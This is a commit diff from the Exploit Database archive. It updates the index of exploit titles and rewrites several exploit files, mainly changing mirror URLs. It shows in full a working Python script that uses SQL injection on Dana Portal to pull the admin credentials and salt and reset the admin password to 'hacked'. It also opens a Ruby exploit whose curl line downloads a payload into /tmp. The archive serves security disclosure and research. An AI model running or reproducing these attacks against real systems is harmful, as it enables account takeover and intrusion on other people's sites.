DB: 2015-04-27

2 new exploits
This commit is contained in:
Offensive Security 2015-04-27 05:02:03 +00:00
parent 14670d8adc
commit 029eaafec5
43 changed files with 398 additions and 241 deletions


@ -149,7 +149,7 @@ id,file,description,date,author,platform,type,port
154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0
155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128
156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Win2k/XP)",2004-02-26,Rave,windows,remote,8080
157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389
157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389
158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21
159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21
160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Missing ""do_munmap"" Exploit",2004-03-01,"Paul Starzetz",linux,local,0
@ -384,7 +384,7 @@ id,file,description,date,author,platform,type,port
413,platforms/linux/remote/413.c,"MusicDaemon <= 0.0.3 - Remote DoS and /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0
416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection Vulnerability",2004-08-25,"Serkan Akpolat",linux,remote,0
417,platforms/linux/local/417.c,"SquirrelMail (chpasswd) Local Root Bruteforce Exploit",2004-08-25,Bytes,linux,local,0
418,platforms/windows/remote/418.c,"Winamp <= 5.04 Skin File (.wsz) Remote Code Execution Exploit",2004-08-25,"Petrol Designs",windows,remote,0
418,platforms/windows/remote/418.c,"Winamp <= 5.04 - Skin File (.wsz) Remote Code Execution Exploit",2004-08-25,"Petrol Designs",windows,remote,0
419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit",2004-08-26,"GulfTech Security",windows,dos,0
420,platforms/win32/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win32,dos,0
421,platforms/windows/remote/421.c,"Gaucho 1.4 Mail Client Buffer Overflow Vulnerability",2004-08-27,"Tan Chew Keong",windows,remote,0
@ -539,7 +539,7 @@ id,file,description,date,author,platform,type,port
693,platforms/windows/remote/693.c,"Ability Server <= 2.34 - Remote APPE Buffer Overflow Exploit",2004-12-16,darkeagle,windows,remote,21
694,platforms/windows/local/694.c,"WinRAR <= 3.4.1 Corrupt ZIP File Vulnerability PoC",2004-12-16,"Vafa Khoshaein",windows,local,0
695,platforms/linux/local/695.c,"Cscope <= 15.5 Symlink Vulnerability Exploit",2004-12-17,Gangstuck,linux,local,0
697,platforms/php/webapps/697.c,"PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)",2004-12-17,overdose,php,webapps,0
697,platforms/php/webapps/697.c,"PHP <= 4.3.9 & phpBB 2.x - unserialize() Remote Exploit (compiled)",2004-12-17,overdose,php,webapps,0
698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit",2004-12-20,"Kristoffer Brånemyr",ultrix,local,0
699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow Exploit",2004-12-20,cees-bart,aix,local,0
700,platforms/windows/dos/700.html,"Microsoft Internet Explorer & MSN Memory_Access_Violation DoS",2004-12-21,"Emmanouel Kellinis",windows,dos,0
@ -714,7 +714,7 @@ id,file,description,date,author,platform,type,port
893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0
895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit",2005-03-22,sd,linux,local,0
896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0
897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0
897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0
898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0
899,platforms/windows/dos/899.pl,"SPECTral Personal SMTP Server <= 0.4.2 - Denial of Service Exploit",2005-03-28,GreenwooD,windows,dos,0
900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Remote Root Heap Overflow Exploit",2005-03-28,infamous41md,linux,remote,25
@ -800,7 +800,7 @@ id,file,description,date,author,platform,type,port
982,platforms/php/webapps/982.c,"ZeroBoard Worm Source Code",2005-05-06,N/A,php,webapps,0
983,platforms/windows/dos/983.cpp,"DataTrac Activity Console Denial of Service Exploit",2005-05-06,basher13,windows,dos,0
984,platforms/multiple/dos/984.c,"Ethereal <= 0.10.10 (dissect_ipc_state) Remote Denial of Service Exploit",2005-05-07,Nicob,multiple,dos,0
986,platforms/windows/remote/986.html,"Mozilla Firefox Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0
986,platforms/windows/remote/986.html,"Mozilla Firefox - Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0
987,platforms/windows/remote/987.c,"Hosting Controller <= 0.6.1 Unauthenticated User Registeration (2nd)",2005-05-07,Silentium,windows,remote,0
988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service Exploit",2005-05-08,basher13,windows,dos,0
989,platforms/php/webapps/989.pl,"PhotoPost Arbitrary Data Remote Exploit",2005-05-13,basher13,php,webapps,0
@ -2849,7 +2849,7 @@ id,file,description,date,author,platform,type,port
3178,platforms/multiple/local/3178.txt,"Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit",2007-01-23,"Joxean Koret",multiple,local,0
3179,platforms/multiple/local/3179.txt,"Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit",2007-01-23,"Joxean Koret",multiple,local,0
3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 (poll_frame.php poll_id) Remote Code Execution Exploit",2007-01-23,r0ut3r,php,webapps,0
3181,platforms/osx/local/3181.rb,"Mac OS X 10.4.8 (UserNotificationCenter) Privilege Escalation Exploit",2007-01-23,MoAB,osx,local,0
3181,platforms/osx/local/3181.rb,"Mac OS X 10.4.8 - (UserNotificationCenter) Privilege Escalation Exploit",2007-01-23,MoAB,osx,local,0
3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 (HTTP 404 - Object not found) DoS Exploit",2007-01-23,shinnai,windows,dos,0
3183,platforms/php/webapps/3183.txt,"BBClone 0.31 (selectlang.php) Remote File Inclusion Vulnerability",2007-01-23,3l3ctric-Cracker,php,webapps,0
3184,platforms/php/webapps/3184.txt,"phpXD <= 0.3 (path) Remote File Inclusion Vulnerability",2007-01-23,3l3ctric-Cracker,php,webapps,0
@ -4164,7 +4164,6 @@ id,file,description,date,author,platform,type,port
4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 client.php Remote File Inclusion Vulnerability",2007-10-11,S.W.A.T.,php,webapps,0
4520,platforms/php/webapps/4520.txt,"PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability",2007-10-11,0in,php,webapps,0
4521,platforms/php/webapps/4521.txt,"Joomla Flash uploader 2.5.1 - Remote File Inclusion Vulnerabilities",2007-10-11,mdx,php,webapps,0
4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 tif File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Newsletter Module Remote SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0
4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion Vulnerability",2007-10-12,"Mehmet Ince",php,webapps,0
4525,platforms/php/webapps/4525.pl,"TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0
@ -8220,7 +8219,7 @@ id,file,description,date,author,platform,type,port
8716,platforms/windows/remote/8716.py,"httpdx <= 0.5b FTP Server (USER) Remote BoF Exploit (SEH)",2009-05-18,His0k4,windows,remote,21
8717,platforms/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0
8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0
8719,platforms/asp/webapps/8719.py,"Dana Portal Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0
8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0
8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0
8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0
@ -18266,7 +18265,7 @@ id,file,description,date,author,platform,type,port
20968,platforms/unix/remote/20968.txt,"Samba 2.0.x/2.2 - Remote Arbitrary File Creation Vulnerability",2001-06-23,"Michal Zalewski",unix,remote,0
20969,platforms/solaris/local/20969.c,"Solaris 8 libsldap Buffer Overflow Vulnerability (1)",2001-06-26,noir,solaris,local,0
20970,platforms/solaris/local/20970.c,"Solaris 8 libsldap Buffer Overflow Vulnerability (2)",2001-06-27,Fyodor,solaris,local,0
20971,platforms/windows/dos/20971.txt,"Adobe Photoshop CS6 PNG Parsing Heap Overflow",2012-09-01,"Francis Provencher",windows,dos,0
20971,platforms/windows/dos/20971.txt,"Adobe Photoshop CS6 - PNG Parsing Heap Overflow",2012-09-01,"Francis Provencher",windows,dos,0
20972,platforms/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal Vulnerability",2001-06-26,gollum,multiple,remote,0
20973,platforms/multiple/remote/20973.txt,"Icecast 1.1.x/1.3.x Slash File Name Denial of Service Vulnerability",2001-06-26,gollum,multiple,remote,0
20974,platforms/solaris/local/20974.c,"Solaris 2.6/2.6/7.0/8 whodo Buffer Overflow Vulnerability",2001-06-01,"Pablo Sor",solaris,local,0
@ -32912,7 +32911,7 @@ id,file,description,date,author,platform,type,port
36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 'domain' Parameter Cross Site Scripting Vulnerability",2012-01-03,Atmon3r,php,webapps,0
36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0
36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0
36491,platforms/windows/remote/36491.txt,"Adobe Flash Player Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0
36492,platforms/php/webapps/36492.txt,"GraphicsClone Script 'term' parameter Cross-Site Scripting Vulnerability",2012-01-04,Mr.PaPaRoSSe,php,webapps,0
36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-01-04,"Mesut Timur",php,webapps,0
36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 'login.php' Script Cross Site Scripting Vulnerability",2012-01-04,"Gjoko Krstic",php,webapps,0
@ -33048,7 +33047,7 @@ id,file,description,date,author,platform,type,port
36630,platforms/php/webapps/36630.txt,"Joomla 'com_products' Component Multiple SQL Injection Vulnerabilities",2012-01-26,the_cyber_nuxbie,php,webapps,0
36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x 'border' Parameter Cross Site Scripting Vulnerability",2012-01-26,"Bret Hawk",php,webapps,0
36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x 'shopping_url' Parameter Cross Site Scripting Vulnerability",2012-01-26,sonyy,php,webapps,0
36633,platforms/linux/dos/36633.txt,"Wireshark Buffer Underflow and Denial of Service Vulnerabilities",2012-01-10,"Laurent Butti",linux,dos,0
36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow and Denial of Service Vulnerabilities",2012-01-10,"Laurent Butti",linux,dos,0
36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component Local File Include and SQL Injection Vulnerabilities",2012-01-28,the_cyber_nuxbie,php,webapps,0
36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0
36637,platforms/lin_x86/shellcode/36637.c,"Disable ASLR in Linux (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0
@ -33083,7 +33082,7 @@ id,file,description,date,author,platform,type,port
36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 DomainConfig.do operation Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0
36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 jsp/AddDC.jsp domainName Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0
36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 'administrator.php' Cross Site Scripting Vulnerability",2012-02-07,"Chokri B.A",php,webapps,0
36669,platforms/linux/dos/36669.txt,"Apache APR Hash Collision Denial Of Service Vulnerability",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial Of Service Vulnerability",2012-01-05,"Moritz Muehlenhoff",linux,dos,0
36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0
36671,platforms/php/webapps/36671.txt,"WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability",2015-04-08,"Claudio Viviani",php,webapps,80
36672,platforms/lin_x86/shellcode/36672.asm,"Linux x86 - Egg-hunter (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0
@ -33161,7 +33160,7 @@ id,file,description,date,author,platform,type,port
36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_uaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36751,platforms/php/webapps/36751.txt,"Wordpress Video Gallery 2.8 - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80
36750,platforms/lin_x86-64/shellcode/36750.c,"linux/x86 setreuid(0_ 0) + execve(""/sbin/halt"") + exit(0) - 49 bytes",2015-04-14,"Febriyanto Nugroho",lin_x86-64,shellcode,0
36750,platforms/lin_x86-64/shellcode/36750.c,"linux/x86 setreuid(0_ 0) + execve(""/sbin/halt"") + exit(0) (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86-64,shellcode,0
36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_user.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36756,platforms/windows/remote/36756.html,"Samsung iPOLiS ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0
36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
@ -33221,5 +33220,7 @@ id,file,description,date,author,platform,type,port
36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
36821,platforms/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution Vulnerability",2015-04-23,"TUNISIAN CYBER",php,webapps,0
36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0
36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0



@ -1,132 +1,132 @@
#!/usr/bin/python
# Abysssec Inc Public Exploit Code
# Title : Dana Portal Remote Change Admin Password Exploit
# Affected Version : ASP Version
# Vulnerable File : albumdetail.asp
# Vendor Site : www.dana.ir
# note : no point to keep it private anymore .
# This exploit ueses of sql injection vulnerability exist in DANA Portal asp version
# the "real" problem is when you extract SHA1 hash , hash is not clear and is SHA1+Salt
# The alghorithm is not really hard to break and writing cracker tool but i prefered
# To update admin password (SH1 + Salt ) with "hacked" word .
# this exploit is just for educational purpose and author will be not be responsible for any damage using this exploit .
# feel free to contact me at : admin [at] abysssec.com
# for working with this exploit you need two asp file for updating hash you can download both from :
# www.abysssec.com/files/dana.zip
# www.milw0rm.com/sploits/2009-dana.zip
# then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code
import string
import urllib
import sys
import re
def Abysssec():
print "\n"
print "#####################################################"
print "# DanaPortal Remote Change Password Exploit #"
print "# www.Abysssec.com #"
print "#####################################################"
print "\n"
#Call Banner
Abysssec()
print "\n[+] Target Host: e.g: http://site.com/danaportal/"
try:
host=raw_input("\nTarget Host : ")
except KeyboardInterrupt:
print "\n[-] Program Terminated"
sys.exit()
print "\n[+] Trying To Connect ...\n"
# Check Http in string
if host[:7] == "http://":
pass
else:
host = "http://"+host
#SQL Injection URL
sql_inject=host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+username+from+tblAuthor)--"
response = urllib.urlopen(sql_inject).read()
print "[+] Trying To Inject Code ...\n"
#Extract Admin User
findall_users=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_users=findall_users(response)
#check found user length
if len(found_ussers)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin User : ",found_users[0]
# Extract Admin Hash
hash_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+password+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(hash_inject).read()
findall_hashs=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_hashs=findall_hashs(response)
if len(found_hashs)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin Hash : ",found_hashs[0]
# Extract Admin Salt
salt_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+salt+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(salt_inject).read()
findall_salt=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_salt=findall_salt(response)
if len(found_salt)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin Salt : ",found_salt[0]
# Extract User Code
usercode_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+user_code+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(usercode_inject).read()
findall_usercode=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_usercode=findall_usercode(response)
if len(found_usercode)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin Code : ",found_usercode[0]
# Generate New Hash + Salt
update_password = "http://wwww.yourasphost.com/salt.asp?salt="+found_salt[0] # change this url with yours !
response = urllib.urlopen(update_password).read()
findall_update=re.compile('(\w+)</object>').findall
found_update=findall_update(response)
updated_hash = ''.join(found_update)
# Update Password
usercode_inject = host+"/albumdetail.asp?Gid=-1+UPDATE+tblauthor+SET+password='"+updated_hash+"'+where+username='"+found_users[0]+"'--"
response = urllib.urlopen(usercode_inject).read()
if len(response) == 0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
else:
print "[+] Updated Successfully \n"
print "[+] Login Url : "+host+"/manage"
print "[+] Username : "+found_users[0]
print "[+] Password : hacked"
# milw0rm.com [2009-05-18]
#!/usr/bin/python
# Abysssec Inc Public Exploit Code
# Title : Dana Portal Remote Change Admin Password Exploit
# Affected Version : ASP Version
# Vulnerable File : albumdetail.asp
# Vendor Site : www.dana.ir
# note : no point to keep it private anymore .
# This exploit ueses of sql injection vulnerability exist in DANA Portal asp version
# the "real" problem is when you extract SHA1 hash , hash is not clear and is SHA1+Salt
# The alghorithm is not really hard to break and writing cracker tool but i prefered
# To update admin password (SH1 + Salt ) with "hacked" word .
# this exploit is just for educational purpose and author will be not be responsible for any damage using this exploit .
# feel free to contact me at : admin [at] abysssec.com
# for working with this exploit you need two asp file for updating hash you can download both from :
# www.abysssec.com/files/dana.zip
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-dana.zip
# then need to upload asp files and change this "http://wwww.yourasphost.com/salt.asp?salt=" in exploit code
import string
import urllib
import sys
import re
def Abysssec():
print "\n"
print "#####################################################"
print "# DanaPortal Remote Change Password Exploit #"
print "# www.Abysssec.com #"
print "#####################################################"
print "\n"
#Call Banner
Abysssec()
print "\n[+] Target Host: e.g: http://site.com/danaportal/"
try:
host=raw_input("\nTarget Host : ")
except KeyboardInterrupt:
print "\n[-] Program Terminated"
sys.exit()
print "\n[+] Trying To Connect ...\n"
# Check Http in string
if host[:7] == "http://":
pass
else:
host = "http://"+host
#SQL Injection URL
sql_inject=host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+username+from+tblAuthor)--"
response = urllib.urlopen(sql_inject).read()
print "[+] Trying To Inject Code ...\n"
#Extract Admin User
findall_users=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_users=findall_users(response)
#check found user length
if len(found_ussers)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin User : ",found_users[0]
# Extract Admin Hash
hash_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+password+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(hash_inject).read()
findall_hashs=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_hashs=findall_hashs(response)
if len(found_hashs)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin Hash : ",found_hashs[0]
# Extract Admin Salt
salt_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+salt+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(salt_inject).read()
findall_salt=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_salt=findall_salt(response)
if len(found_salt)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin Salt : ",found_salt[0]
# Extract User Code
usercode_inject = host+"/albumdetail.asp?Gid=1+or+1=(select+top+1+user_code+from+tblAuthor+where+username+in+('"+found_users[0]+"'))--"
response = urllib.urlopen(usercode_inject).read()
findall_usercode=re.compile('<font face="Arial" size=2>Conversion failed when converting the nvarchar value \'(\w+)\' to data type int.</font>').findall
found_usercode=findall_usercode(response)
if len(found_usercode)==0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
print "\n[+] Admin Code : ",found_usercode[0]
# Generate New Hash + Salt
update_password = "http://wwww.yourasphost.com/salt.asp?salt="+found_salt[0] # change this url with yours !
response = urllib.urlopen(update_password).read()
findall_update=re.compile('(\w+)</object>').findall
found_update=findall_update(response)
updated_hash = ''.join(found_update)
# Update Password
usercode_inject = host+"/albumdetail.asp?Gid=-1+UPDATE+tblauthor+SET+password='"+updated_hash+"'+where+username='"+found_users[0]+"'--"
response = urllib.urlopen(usercode_inject).read()
if len(response) == 0:
print "[-] Exploit Failed, Maybe Your Target Is Not Vulnerable "
sys.exit()
else:
print "[+] Updated Successfully \n"
print "[+] Login Url : "+host+"/manage"
print "[+] Username : "+found_users[0]
print "[+] Password : hacked"
# milw0rm.com [2009-05-18]
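Review bot: The only substantive change in this section is the mirror URL at the `www.milw0rm.com/sploits/2009-dana.zip` header line, yet the whole 132-line file is shown as removed and re-added, which suggests a line-ending or encoding rewrite went in alongside the URL swap; for an archive whose value is the verbatim original, a whitespace-only rewrite hides the one real edit and makes the record harder to audit. Consider committing the normalisation separately, or leaving the original bytes untouched and adding the new mirror as an extra comment line rather than replacing the old one, e.g. `# mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-dana.zip`. The same whole-file replacement pattern appears in the 3181.rb section below, where again only the `INPUTMANAGER_URL` line differs.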


@ -10,4 +10,4 @@ http://malerisch.net/docs/advisories/adobe_robohelp_dom_cross_site_scripting_xss
For reference, original vendor advisory:
http://www.adobe.com/support/security/bulletins/apsb11-23.html
Mirror: http://www.exploit-db.com/download_pdf/17653
Mirror: http://www.exploit-db.com/docs/17653.pdf


@ -8,4 +8,4 @@ Versions prior to Linux kernel 2.6.33-rc6 are vulnerable.
NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33585.tgz


@ -6,4 +6,4 @@ Remote attackers can exploit these issues to execute arbitrary code in the conte
Wireshark versions 1.4.0 through 1.4.10 and 1.6.0 through 1.6.4 are vulnerable.
http://www.exploit-db.com/sploits/36633.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36633.zip


@ -4,4 +4,4 @@ Apache APR is prone to a denial-of-service vulnerability.
An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests.
http://www.exploit-db.com/sploits/36669.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36669.zip


@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/
http://www.exploit.db.com/sploits/moaub-23-exploit.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-23-exploit.zip
'''
'''


@ -4,4 +4,4 @@ Rockwell Automation FactoryTalk Activation Server is prone to multiple remote de
An attacker can exploit these issues to crash the affected application, denying service to legitimate users.
http://www.exploit-db.com/sploits/36570.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36570.zip


@ -20,5 +20,5 @@ snort-2.8.4
snort-2.8.5.beta*
link: http://pablo-secdev.blogspot.com/2009/09/snort-28-285stable-unified1-output-bug.html
poc: http://www.exploit-db.com/archive/2009-snort-unified1_bug.tar.gz
poc: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/2009-snort-unified1_bug.tar.gz
# milw0rm.com [2009-09-21]


@ -15,7 +15,7 @@ potential damage to their assets caused by Sophos.
The paper is available to download at the link below.
https://lock.cmpxchg8b.com/sophailv2.pdf
http://www.exploit-db.com/wp-content/themes/exploit/docs/22510.pdf
http://www.exploit-db.com/docs/22510.pdf
A working exploit for Sophos 8.0.6 on Mac is available, however the
techniques used in the exploit easily transfer to Windows and Linux,


@ -1,44 +1,44 @@
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M. Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
#
require 'fileutils'
bugselected = (ARGV[0] || 0).to_i
# INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
# keeping a local backup. /str0ke
INPUTMANAGER_URL = "http://www.milw0rm.com/sploits/MOAB-22-01-2007_im.tar.gz"
INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
